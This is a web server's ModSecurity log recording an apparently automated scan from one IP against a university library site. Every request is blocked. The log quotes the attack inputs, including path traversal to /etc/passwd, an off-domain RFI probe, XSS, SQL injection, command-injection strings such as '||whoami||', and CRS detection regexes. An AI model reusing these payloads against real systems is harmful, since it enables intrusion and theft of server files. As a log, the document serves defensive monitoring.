[Tue Aug 29 11:42:00.377017 2023] [:error] [pid 1866] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26ga1u7ezoxzxgj8.oast.site/hqbq.txt found within TX:1: cjmnbitjmimt14dgn26ga1u7ezoxzxgj8.oast.site/hqbq.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/plugins/ueditor/php/controller.php"] [unique_id "ZO13GMCo-f0AAAdKXLsAAAAK"]
[Tue Aug 29 11:42:01.410318 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:controller: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13GcCo-f0AAAdOeOUAAAAS"]
[Tue Aug 29 11:42:04.369926 2023] [:error] [pid 1866] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:cat /etc/passwd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/command.cgi"] [unique_id "ZO13HMCo-f0AAAdKXMUAAAAK"]
[Tue Aug 29 11:42:05.439510 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:download. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:download: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13HcCo-f0AAAdOeO8AAAAS"]
[Tue Aug 29 11:42:06.482819 2023] [:error] [pid 1854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:msg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/socialfit/popup.php"] [unique_id "ZO13HsCo-f0AAAc@cWIAAAAL"]
[Tue Aug 29 11:42:07.412943 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13H8Co-f0AAAdSZJ4AAAAX"]
[Tue Aug 29 11:42:07.704840 2023] [:error] [pid 1871] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:apikey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:apikey: 'UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO13H8Co-f0AAAdPLxkAAAAT"]
[Tue Aug 29 11:42:08.380202 2023] [:error] [pid 1882] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:file: /../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13IMCo-f0AAAdaZNQAAAAM"]
[Tue Aug 29 11:42:08.391579 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:service-cmds-peform. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:service-cmds-peform: ||whoami||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/cyrus.index.php"] [unique_id "ZO13IMCo-f0AAAcoNg4AAAAF"]
[Tue Aug 29 11:42:09.407350 2023] [:error] [pid 1882] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:file: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13IcCo-f0AAAdaZNgAAAAM"]
[Tue Aug 29 11:42:11.365599 2023] [:error] [pid 1847] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:sn: ../../WEB-INF/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/brightmail/servlet/com.ve.kavachart.servlet.ChartStream"] [unique_id "ZO13I8Co-f0AAAc36zoAAAAO"]
[Tue Aug 29 11:42:11.431432 2023] [:error] [pid 1879] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13I8Co-f0AAAdXIlQAAAAd"]
[Tue Aug 29 11:42:12.413248 2023] [:error] [pid 1884] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/downloader.php"] [unique_id "ZO13JMCo-f0AAAdcs88AAAAC"]
[Tue Aug 29 11:42:14.355750 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13JsCo-f0AAAdeQz0AAAAQ"]
[Tue Aug 29 11:42:14.416988 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/filemanager/ajax_calls.php"] [unique_id "ZO13JsCo-f0AAAdb7icAAAAb"]
[Tue Aug 29 11:42:14.431078 2023] [:error] [pid 1885] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:pg: ../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/tarantella/cgi-bin/secure/ttawlogin.cgi/"] [unique_id "ZO13JsCo-f0AAAddJqwAAAAh"]
[Tue Aug 29 11:42:15.398397 2023] [:error] [pid 1880] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:cat_id: ${system(ls)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/infusions/downloads/downloads.php"] [unique_id "ZO13J8Co-f0AAAdYBA0AAAAe"]
[Tue Aug 29 11:42:17.388630 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page_slug. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:page_slug: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13KcCo-f0AAAdb7iwAAAAb"]
[Tue Aug 29 11:42:19.368197 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:search_key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:search_key: {{1337*1338}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/search"] [unique_id "ZO13K8Co-f0AAAdftQwAAAAG"]
[Tue Aug 29 11:42:19.401335 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:configuration. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:configuration: o:10:pma_config:1:{s:6:source s:11:/etc/passwd }"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/scripts/setup.php"] [unique_id "ZO13K8Co-f0AAAdftQ0AAAAG"]
[Tue Aug 29 11:42:21.483963 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:classes_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:classes_dir: ../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/classes/phpmailer/class.cs_phpmailer.php"] [unique_id "ZO13LcCo-f0AAAdECboAAAAW"]
[Tue Aug 29 11:42:23.394324 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/src/addressbook.php"] [unique_id "ZO13L8Co-f0AAAc92xgAAAAD"]
[Tue Aug 29 11:42:24.385033 2023] [:error] [pid 1879] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:optpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:optpage: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/src/options.php"] [unique_id "ZO13MMCo-f0AAAdXImYAAAAd"]
[Tue Aug 29 11:42:25.403852 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:mailbox: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/src/search.php"] [unique_id "ZO13McCo-f0AAAdftRkAAAAG"]
[Tue Aug 29 11:42:26.376085 2023] [:error] [pid 1854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:where. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:where: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/src/search.php"] [unique_id "ZO13MsCo-f0AAAc@cYMAAAAL"]
[Tue Aug 29 11:42:27.397929 2023] [:error] [pid 1899] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `echo found within ARGS:: `echo cve-2022-33891 | rev`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/doAs"] [unique_id "ZO13M8Co-f0AAAdrEmgAAAAn"]
[Tue Aug 29 11:42:27.399698 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:chapter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:chapter: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/src/help.php"] [unique_id "ZO13M8Co-f0AAAdftR0AAAAG"]
[Tue Aug 29 11:42:28.434552 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:test-head. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:test-head: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/nextgen-gallery/nggallery.php"] [unique_id "ZO13NMCo-f0AAAdftSEAAAAG"]
[Tue Aug 29 11:42:29.700391 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../ found within ARGS:path: /../../Content"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/api/filemanager"] [unique_id "ZO13NcCo-f0AAAQSW0YAAAA0"]
